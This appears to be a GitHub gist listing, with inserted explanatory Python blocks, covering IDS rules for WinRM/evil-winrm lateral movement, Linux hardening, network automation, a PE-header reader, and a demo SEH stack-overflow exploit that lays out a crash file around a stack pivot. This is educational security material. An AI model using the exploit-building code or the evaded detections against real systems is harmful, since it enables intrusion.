Nicolas Chabbey e3prom

  • Switzerland
@e3prom
e3prom / ep-postexpl-c2.rules
Created January 6, 2023 15:45
Snort/Suricata Additional C2/Post-Exploitation Ruleset
## Snort/Suricata Rules
## Provides additional detection of potential post-exploitation attacks, lateral-movements and C2 communication/beaconing.
alert http $EXTERNAL_NET any -> $HOME_NET 5985 (msg:"[EP] Windows Remote Management (WinRM)"; flow:established,to_server; content:"POST"; http_method; content:"/wsman"; nocase; http_uri; classtype:policy-violation; sid:9001002; rev:1; metadata:created_at 2022_11_09, updated_at 2022_11_09;)
alert http $EXTERNAL_NET any -> $HOME_NET 5985 (msg:"[EP] WinRM Evil Client"; flow:established,to_server; content:"POST"; http_method; content:"Ruby WinRM Client"; nocase; http_user_agent; classtype:misc-attack; sid:9001003; rev:1; metadata:created_at 2022_11_09, updated_at 2022_11_09;)
alert tls $EXTERNAL_NET any -> $HOME_NET 5986 (msg:"[EP] Windows Remote Management (WinRM) over TLS"; flow:established,to_server; content:"|1603 01|"; fast_pattern; stream_size: client, >,0; stream_size: server, >,0; classtype:policy-violation; sid:9001004; rev:1; metadata:created_at 2022_
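The two HTTP-layer rules above (sids 9001002 and 9001003) reduce to a method check, a URI substring and a User-Agent substring, all case-insensitive, restricted to port 5985. The following is an added example, not part of the gist and not Snort/Suricata code: it re-implements that matching logic in Python and runs it over constructed request samples so the conditions can be checked without an IDS. Flow tracking and the TLS rule (sid 9001004) are not modelled.

```python
# Added example: minimal emulation of the two HTTP WinRM rules (sids 9001002, 9001003).
# Not Snort/Suricata code; it models only the http_method / "/wsman" / http_user_agent
# content checks and the destination port, run over constructed request samples.
from dataclasses import dataclass
from typing import Dict, List

HOME_NET_PORT = 5985  # both rules are restricted to $HOME_NET 5985


@dataclass
class HttpRequest:
    dst_port: int
    method: str
    uri: str
    headers: Dict[str, str]


def parse_request(dst_port: int, raw: bytes) -> HttpRequest:
    """Parse a raw HTTP/1.1 request head (request line + headers) into fields."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return HttpRequest(dst_port, method, uri, headers)


def match_rules(req: HttpRequest) -> List[int]:
    """Return the sids of the emulated rules that fire on this request, in rule order."""
    fired: List[int] = []
    if req.dst_port != HOME_NET_PORT:
        return fired
    # sid 9001002: http_method "POST" and "/wsman" in the request URI (nocase).
    if req.method == "POST" and "/wsman" in req.uri.lower():
        fired.append(9001002)
    # sid 9001003: http_method "POST" and "Ruby WinRM Client" in the User-Agent (nocase).
    user_agent = req.headers.get("user-agent", "")
    if req.method == "POST" and "ruby winrm client" in user_agent.lower():
        fired.append(9001003)
    return fired


# Constructed sample traffic (not captured from a real host).
SAMPLE_EVIL = (b"POST /wsman HTTP/1.1\r\nHost: 10.0.0.5:5985\r\n"
               b"User-Agent: Ruby WinRM Client\r\nContent-Type: application/soap+xml\r\n\r\n")
SAMPLE_ADMIN = (b"POST /WSMAN HTTP/1.1\r\nHost: 10.0.0.5:5985\r\n"
                b"User-Agent: Microsoft WinRM Client\r\n\r\n")
SAMPLE_OTHER = b"GET /index.html HTTP/1.1\r\nHost: 10.0.0.5:5985\r\n\r\n"

if __name__ == "__main__":
    for name, raw in (("evil", SAMPLE_EVIL), ("admin", SAMPLE_ADMIN), ("other", SAMPLE_OTHER)):
        print(name, match_rules(parse_request(HOME_NET_PORT, raw)))
```

The "admin" sample shows why sid 9001002 is a policy-violation rule rather than an attack signature: any WinRM client, including legitimate PowerShell remoting, triggers it, and only the User-Agent rule singles out the Ruby client used by evil-winrm.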
@e3prom
e3prom / centos8-syshardening-cispartial.sh
Created January 6, 2023 15:30
CentOS 8 System Hardening Script (CIS/Partial)
#!/bin/sh
# CentOS 8 Hardening Script (CIS Benchmark Partial)
### FILESYSTEMS
/bin/echo -n '[*] Disabling unneeded filesystems... '
/bin/echo 'install cramfs /bin/true' > /etc/modprobe.d/cramfs.conf
/bin/echo 'install squashfs /bin/true' > /etc/modprobe.d/squashfs.conf
/bin/echo 'install udf /bin/true' > /etc/modprobe.d/udf.conf
/bin/echo 'install usb-storage /bin/true' > /etc/modprobe.d/usb-storage.conf
/bin/echo 'install iscsi_tcp /bin/true' > /etc/modprobe.d/iscsi_tcp.conf
#/bin/echo 'install libiscsi /bin/true' >> /etc/modprobe.d/iscsi_tcp.conf
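The script writes one `install <module> /bin/true` stub per filesystem or driver module. The following is an added example, not part of the gist: a Python audit that parses modprobe.d contents and reports, for each module the script disables, whether an `install` stub and a `blacklist` line are present. It reads constructed file contents rather than a live /etc/modprobe.d so it runs anywhere; point it at real files to audit a host.

```python
# Added example (not the gist's code): audit modprobe.d for the modules the
# hardening script above disables. Input is constructed inline, not read from disk.
import re
from typing import Dict, List

DISABLED_MODULES = ["cramfs", "squashfs", "udf", "usb-storage", "iscsi_tcp"]

# Directives that stop a module from loading:
#   install <mod> /bin/true | /bin/false   - modprobe runs the stub instead of loading
#   blacklist <mod>                        - blocks alias-based autoload only
INSTALL_RE = re.compile(r"^\s*install\s+(\S+)\s+(/bin/true|/bin/false)\s*$")
BLACKLIST_RE = re.compile(r"^\s*blacklist\s+(\S+)\s*$")


def normalize(name: str) -> str:
    """modprobe treats '-' and '_' in module names as equivalent."""
    return name.replace("-", "_")


def audit_modprobe(files: Dict[str, str]) -> Dict[str, Dict[str, bool]]:
    """Map each expected module to whether an install stub and a blacklist line exist."""
    installed, blacklisted = set(), set()
    for _path, text in files.items():
        for line in text.splitlines():
            line = line.split("#", 1)[0]  # drop comments, e.g. the disabled libiscsi line
            m = INSTALL_RE.match(line)
            if m:
                installed.add(normalize(m.group(1)))
            m = BLACKLIST_RE.match(line)
            if m:
                blacklisted.add(normalize(m.group(1)))
    return {
        mod: {"install": normalize(mod) in installed,
              "blacklist": normalize(mod) in blacklisted}
        for mod in DISABLED_MODULES
    }


def missing_install_stubs(files: Dict[str, str]) -> List[str]:
    """Modules from the hardening list that lack an install stub."""
    return [mod for mod, res in audit_modprobe(files).items() if not res["install"]]


# Constructed modprobe.d contents: like the script's output, except udf.conf is
# missing and usb-storage is only blacklisted.
SAMPLE_MODPROBE_D = {
    "/etc/modprobe.d/cramfs.conf": "install cramfs /bin/true\n",
    "/etc/modprobe.d/squashfs.conf": "install squashfs /bin/false\nblacklist squashfs\n",
    "/etc/modprobe.d/usb-storage.conf": "blacklist usb-storage\n",
    "/etc/modprobe.d/iscsi_tcp.conf": "install iscsi_tcp /bin/true\n#install libiscsi /bin/true\n",
}

if __name__ == "__main__":
    for mod, res in audit_modprobe(SAMPLE_MODPROBE_D).items():
        print(f"{mod:12} install={res['install']!s:5} blacklist={res['blacklist']}")
    print("missing install stubs:", missing_install_stubs(SAMPLE_MODPROBE_D))
```

A `blacklist` line alone does not satisfy the check: it only prevents autoloading via an alias, while an explicit `modprobe usb-storage` (or a dependency pulling it in) still loads the module. The `install ... /bin/true` stub is what makes those paths fail; neither stops root from loading the object with `insmod` directly.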
@e3prom
e3prom / automation-ios-xe-ospf-restconf.py
Last active February 20, 2019 15:47
Simple automation script to configure OSPF from YANG data model, on IOS-XE using RESTCONF
#!/usr/bin/env python
# Automation skeleton for IOS-XE (RESTCONF) with YANG
# Nicolas Chabbey <e3prom>
#
# conf/devices.conf:
# devices:
#   - hostname: 10.240.0.180
#     type: cisco-ios-xe
#     port: 443
#     verify: False
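The devices.conf block above carries a `verify: False` entry, which in practice turns off TLS certificate checking for the RESTCONF session. The following is an added example, not the gist's own code: it assembles the RESTCONF PUT for an OSPF process from a devices.conf-style entry and makes the insecure setting an explicit opt-in. The YANG node names and URL path (`Cisco-IOS-XE-native:native/router/Cisco-IOS-XE-ospf:ospf`, keyed by `id`) are assumptions based on the 16.x native model and are not taken from the gist; the credentials and network are constructed.

```python
# Added example (not the gist's code): build the RESTCONF PUT that creates an OSPF
# process on IOS-XE and refuse to honour 'verify: False' unless explicitly allowed.
# The YANG path and node names below are assumptions (Cisco-IOS-XE-native model,
# 16.x era) and may differ between releases.
import base64
import json
import ssl
import urllib.request
from typing import Dict, List, Tuple

# Module-qualified path of the OSPF process list under the native model (assumed).
OSPF_PATH = "restconf/data/Cisco-IOS-XE-native:native/router/Cisco-IOS-XE-ospf:ospf"


def ospf_payload(process_id: int, networks: List[Dict[str, str]]) -> dict:
    """JSON body for one OSPF process and its 'network <ip> <wildcard> area <n>' lines."""
    return {
        "Cisco-IOS-XE-ospf:ospf": [{
            "id": process_id,
            "network": [
                {"ip": n["ip"], "wildcard": n["wildcard"], "area": int(n["area"])}
                for n in networks
            ],
        }]
    }


def restconf_url(device: dict, process_id: int) -> str:
    """Address the list entry keyed by process id, e.g. .../Cisco-IOS-XE-ospf:ospf=1."""
    return f"https://{device['hostname']}:{device.get('port', 443)}/{OSPF_PATH}={process_id}"


def tls_context(device: dict, allow_insecure: bool = False) -> ssl.SSLContext:
    """'verify: False' disables certificate and hostname checks; require an explicit opt-in."""
    ctx = ssl.create_default_context()
    if not device.get("verify", True):
        if not allow_insecure:
            raise ValueError(f"{device['hostname']}: verify is False, refusing without allow_insecure=True")
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    return ctx


def build_request(device: dict, process_id: int, networks: List[Dict[str, str]],
                  user: str, password: str, allow_insecure: bool = False
                  ) -> Tuple[urllib.request.Request, ssl.SSLContext]:
    """Build (but do not send) the PUT with Basic auth and YANG JSON media types."""
    body = json.dumps(ospf_payload(process_id, networks)).encode()
    req = urllib.request.Request(restconf_url(device, process_id), data=body, method="PUT")
    req.add_header("Content-Type", "application/yang-data+json")
    req.add_header("Accept", "application/yang-data+json")
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    return req, tls_context(device, allow_insecure)


def push_ospf(device: dict, process_id: int, networks: List[Dict[str, str]],
              user: str, password: str, allow_insecure: bool = False) -> int:
    """Send the request; RESTCONF answers 201 (created) or 204 (replaced)."""
    req, ctx = build_request(device, process_id, networks, user, password, allow_insecure)
    with urllib.request.urlopen(req, context=ctx, timeout=15) as resp:
        return resp.status


# Constructed device entry in the shape of the devices.conf block above.
DEVICE = {"hostname": "10.240.0.180", "type": "cisco-ios-xe", "port": 443, "verify": False}
NETWORKS = [{"ip": "10.240.0.0", "wildcard": "0.0.0.255", "area": "0"}]

if __name__ == "__main__":
    req, _ctx = build_request(DEVICE, 1, NETWORKS, "admin", "example-password", allow_insecure=True)
    print(req.get_method(), req.full_url)
    print(req.data.decode())
```

Failing closed on `verify: False` matters because the session carries Basic credentials for a privileged device account; with verification off, anyone on the path can present a certificate, capture them and push their own configuration. Load the real devices.conf with PyYAML and pass each entry as `device`.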
@e3prom
e3prom / rust-int-strings-ownership.rs
Last active February 20, 2019 15:36
A simple program to demonstrate ownership and pointers (de-)references with Rust.
fn main() {
    // simple memory tests with integers (usually stored on the stack).
    // integer types implement the Copy trait, therefore the old variable is still
    // available and can be referenced after the assignment.
    let x = 1;
    let y = x;
    println!("x stored at {:p} is {}, y stored at {:p} is {}", &x, x, &y, y);
    // tests with immutable strings.
    let s1 = "immutable";

Keybase proof

I hereby claim:

  • I am e3prom on github.
  • I am e3prom (https://keybase.io/e3prom) on keybase.
  • I have a public key ASDeEdU2gxUTwAsyTjq3s_tyPQH5T3ZZYWGLudhT241hpQo

To claim this, I am signing this object:

@e3prom
e3prom / win-x86-loadaddr.py
Created March 9, 2018 13:56
Load DLL in memory using the Windows API LoadLibrary() function and return base address.
'''
This script allows you to load a DLL using the Windows API 'LoadLibrary()' function
and returns its load address and the relative virtual address of its text section.
You can specify multiple DLL files at once using the wildcard (globbing) character.
Note to self: next time use argparse instead of the *limited* getopt.
Coded with some love by e3prom <github.com/e3prom>
'''
from ctypes import windll
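The gist obtains the base address by actually loading the DLL, which runs its DllMain and only works on Windows. The following is an added example, not the gist's code: it recovers the same two figures, the image base and the .text section's relative virtual address, by parsing the PE headers statically, so it runs on any OS and executes nothing from the DLL. A minimal PE32 image is constructed inline (headers only, no code) so the example is self-contained; pass a real DLL path to inspect one.

```python
# Added example (not the gist's code): read ImageBase and the .text RVA from PE
# headers instead of calling LoadLibrary(). Handles PE32 and PE32+. The test image
# built by build_minimal_pe32() is constructed and contains no code.
import struct
from typing import Any, Dict


def pe_info(data: bytes) -> Dict[str, Any]:
    """Parse DOS, COFF and optional headers plus the section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]   # NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]      # SizeOfOptionalHeader
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:                                            # PE32: ImageBase DWORD at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    elif magic == 0x20B:                                          # PE32+: ImageBase QWORD at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    sections: Dict[str, int] = {}
    table = opt + opt_size                                        # section headers follow the optional header
    for i in range(num_sections):
        off = table + i * 40                                      # IMAGE_SECTION_HEADER is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        sections[name] = struct.unpack_from("<I", data, off + 12)[0]  # VirtualAddress (RVA)
    return {"image_base": image_base, "sections": sections}


def text_address(data: bytes) -> int:
    """Preferred (pre-ASLR) virtual address of .text: ImageBase + RVA."""
    info = pe_info(data)
    return info["image_base"] + info["sections"][".text"]


def build_minimal_pe32(image_base: int = 0x10000000, text_rva: int = 0x1000) -> bytes:
    """Constructed PE32 DLL image: valid headers and one '.text' section, no code bytes."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 224                                                # standard PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x2102)  # i386, 1 section, DLL
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                        # Magic = PE32
    struct.pack_into("<I", opt, 16, text_rva)                     # AddressOfEntryPoint
    struct.pack_into("<I", opt, 20, text_rva)                     # BaseOfCode
    struct.pack_into("<I", opt, 28, image_base)                   # ImageBase
    section = b".text".ljust(8, b"\0") + struct.pack("<II", 0x200, text_rva) + b"\0" * 24
    return dos + b"PE\0\0" + coff + bytes(opt) + section


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe32()
    info = pe_info(blob)
    print(f"ImageBase 0x{info['image_base']:08x}  .text RVA 0x{info['sections']['.text']:08x}"
          f"  .text VA 0x{text_address(blob):08x}")
```

Under ASLR the base that LoadLibrary() returns usually differs from the header's ImageBase, so the two approaches agree only on the RVA, which is the stable quantity the gist reports relative to the load address.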
@e3prom
e3prom / generic-stack-overflow-file-exploit.py
Created January 18, 2018 14:54
Demo exploit code for generic-stack-overflow-file.c, a basic stack-based overflow with SE handler pointer overwrite.
# generic-stack-overflow-file-exploit.py
# Sample exploit code for generic-stack-overflow-file.c, available at:
# https://github.com/e3prom/shellcode/blob/master/dev/generic-stack-overflow.c
#
# Exploitability:
# There is no direct return pointer (RP) overwrite, however we can control the SE handler pointer at offset 808.
# The SE handler pointer points to a stack pivot.
# This exploit is a little bit messy, I do apologize.
import struct
file = 'crash.txt'
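The comments above state the two facts an SEH exploit is built on: the handler pointer lands at offset 808 of the file contents, and it is pointed at a stack pivot. The following is an added example, not the gist's exploit: it shows how such an offset is found with a cyclic pattern and how the crash file is laid out once it is known. The pivot address (0x41424344), the nSEH bytes and the breakpoint-stub "shellcode" are placeholders; a real exploit takes the pivot from a non-SafeSEH module of the target.

```python
# Added example (not the gist's exploit): find the SE handler offset with a cyclic
# pattern, then lay out the crash file around it. Pivot address, nSEH bytes and
# shellcode below are placeholders, not values from the gist.
import string
import struct


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern (Aa0Aa1Aa2...): every 4-byte window is unique within 20280 bytes."""
    out = bytearray()
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out += f"{a}{b}{c}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern length exceeds 20280 bytes")


def pattern_offset(pattern: bytes, value: int) -> int:
    """Offset in the pattern of a DWORD read from a crashed register or the SEH chain (-1 if absent)."""
    return pattern.find(struct.pack("<I", value))


SEH_OFFSET = 808              # from the gist: the SE handler pointer is overwritten at offset 808
NSEH_OFFSET = SEH_OFFSET - 4  # the next-SEH pointer immediately precedes the handler in the record


def build_crash_file(pivot_addr: int, shellcode: bytes, total_len: int = 1200,
                     bad_chars: bytes = b"\x00") -> bytes:
    """Layout: filler up to nSEH, nSEH placeholder, handler = pivot, shellcode, trailing filler."""
    pivot = struct.pack("<I", pivot_addr)
    if any(b in pivot for b in bad_chars):
        raise ValueError("pivot address contains a bad character")
    buf = b"A" * NSEH_OFFSET
    buf += b"\x90" * 4                # nSEH placeholder (assumption: the pivot does not execute it)
    buf += pivot                      # SE handler -> stack pivot
    buf += shellcode
    if len(buf) > total_len:
        raise ValueError("shellcode does not fit in the requested file length")
    return buf + b"C" * (total_len - len(buf))


if __name__ == "__main__":
    # Step 1: crash the target with the pattern and read the handler value in the debugger.
    pat = cyclic_pattern(1200)
    # Step 2: the value read from the SEH chain (constructed here by slicing the pattern).
    seen = struct.unpack("<I", pat[808:812])[0]
    print("SE handler overwritten at offset", pattern_offset(pat, seen))
    # Step 3: write the real file with the placeholder pivot and a 0xCC stub as shellcode.
    with open("crash.txt", "wb") as fh:
        fh.write(build_crash_file(0x41424344, b"\xcc" * 16))
```

The bad-character check is there because a file-driven overflow copies the contents with a string routine in many cases, so a pivot address containing 0x00 (or whatever byte terminates the copy) never reaches the SEH record; extend `bad_chars` with whatever the target's parser rejects.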